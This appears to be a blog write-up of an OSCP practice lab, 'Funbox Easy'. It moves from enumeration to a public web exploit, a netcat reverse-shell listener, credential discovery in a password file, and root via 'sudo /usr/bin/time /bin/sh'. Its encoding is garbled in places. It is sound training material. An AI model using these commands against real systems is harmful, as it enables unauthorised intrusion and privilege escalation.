Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

Funbox Easy โ€” Web Exploit to GTFOBins Privilege Escalation

Today's machine demonstrated how vulnerable web applications combined with weak privilege configurations can lead to full system compromise.

๐Ÿ”Ž Step 1: Initial Enumeration

Started with aggressive Nmap scan:

nmap -sCV -A โ€” min-rate 1000 192.168.xx.xx

Explanation:

  • -sC โ†’ Default scripts
  • -sV โ†’ Service version detection
  • -A โ†’ OS detection + aggressive scan
  • โ€” min-rate 1000 โ†’ Faster scanning
None

Findings:

โœ” Port 80 open โœ” Web server running

None

๐ŸŒ Step 2: Directory Brute Force

Performed directory enumeration:

feroxbuster โ€” url http://192.168.xx.xx

None

To discover hidden directories and endpoints.

Result:

โœ” Found /store directory โœ” Identified application: CSE Bookstore Online

None

๐Ÿ’ฅ Step 3: Searching for Exploit

Searched exploit database:

searchsploit cse bookstore online

None

Found a working public exploit.

Downloaded exploit:

searchsploit -m <exploit_id>

None

Download and run exploit

None

๐Ÿš Step 4: Reverse Shell Execution

Started listener on attacker machine:

None

Started listener on attacker machine:

nc -lnvp 1234

None

Modified exploit to include reverse shell payload.

Executed exploit โ†’ Reverse shell received successfully.

Upgraded shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

๐Ÿ” Step 5: Post Exploitation

While enumerating system users:

Discovered user: tony

Found password file inside tony's directory:

cat password.txt

None

Used discovered password to switch user:

su tony

Successfully accessed tony account.

None

โšก Step 6: Privilege Escalation (GTFOBins โ€” time)

Enumerated sudo permissions:

sudo -l

None

Observed that time binary could be executed with sudo.

Checked GTFOBins for time.

None

Used:

sudo /usr/bin/time /bin/sh

None

If a binary is allowed via sudo and supports command execution, it can spawn a shell with root privileges.

๐ŸŽฅ Full Practical Demonstration For a complete step-by-step video walkthrough, watch here:

๐Ÿ‘‘ Result

โœ” Web exploitation โœ” Reverse shell access โœ” Credential discovery โœ” User pivot to tony โœ” GTFOBins privilege escalation โœ” Root shell obtained